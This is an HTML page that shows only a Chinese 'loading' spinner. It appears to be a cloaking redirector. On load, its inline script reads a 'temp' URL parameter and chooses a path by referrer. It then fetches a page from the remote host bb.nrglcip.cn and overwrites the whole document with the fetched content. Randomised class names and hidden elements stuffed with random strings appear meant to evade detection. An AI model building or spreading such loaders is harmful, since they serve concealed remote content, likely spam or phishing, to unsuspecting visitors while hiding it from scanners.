<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .H2LrysqN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .H2LrysqN .LGVhIdSrNH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .H2LrysqN .content {
            line-height: 50px;
            text-align: center
        }

        .H2LrysqN .img {
            width: 100%
        }

        .H2LrysqN .s0DO6v2Y {
            text-align: center
        }

        .H2LrysqN .s0DO6v2Y span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .H2LrysqN .s0DO6v2Y span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .H2LrysqN .s0DO6v2Y span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .H2LrysqN .s0DO6v2Y span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .H2LrysqN .s0DO6v2Y span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .H2LrysqN .s0DO6v2Y span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .H2LrysqN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dY4FuTSh3v5My(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var t5vuIiy = dY4FuTSh3v5My('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ t5vuIiy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ t5vuIiy +".html?a=share";
		}
		
        jvRT77G=url+"#"+new Date().getTime();
        jvRT77G && function() {
            $.get(jvRT77G, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >CAomZgiP9ODSwWzgpOJWd2ZBDndGk51KK7BfYo</ul>
<b style='display:none' >R4EItb7DuCVEc6hGsDsMtpBok8rCbrPPjtWX1u2Wj8Lwx</b>
<div style='display:none'>tFe0u0feZvSUdyFotiWfKu2hDR3IzFrgsucF3</div><div class="H2LrysqN">
    <div class="LGVhIdSrNH">
        <div class="s0DO6v2Y">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>w557sKaxoEp0Ucaq8gduZIFOqZLwaEtfmVdd3V3aYY8ZqCW28jJtytD1BDhusi4hxcv2Nu3</a>
<div style='display:none'>qw9xS0dmXe4RMbjpOotIoKYmMOZ8QXqEFJYkWz8t46Uj5PKHPZcfXVesFn9bmQUg7jM9</div>
<span style='display:none'>Y6MsRvEyRwak9DkvE7X1X4X270Sb02mFASdhEewdVdGE8Bcxb1WD</span>
<p  style='display:none'>osTUwlMcoiEojPUYtRlGo74gnx8FFbjlUCXm3rauweEav47</p>
<span style='display:none'>Y6MsRvEyRwak9DkvE7X1X4X270Sb02mFASdhEewdVdGE8Bcxb1WD</span>
<img  src='' style='display:none'></body>
</html>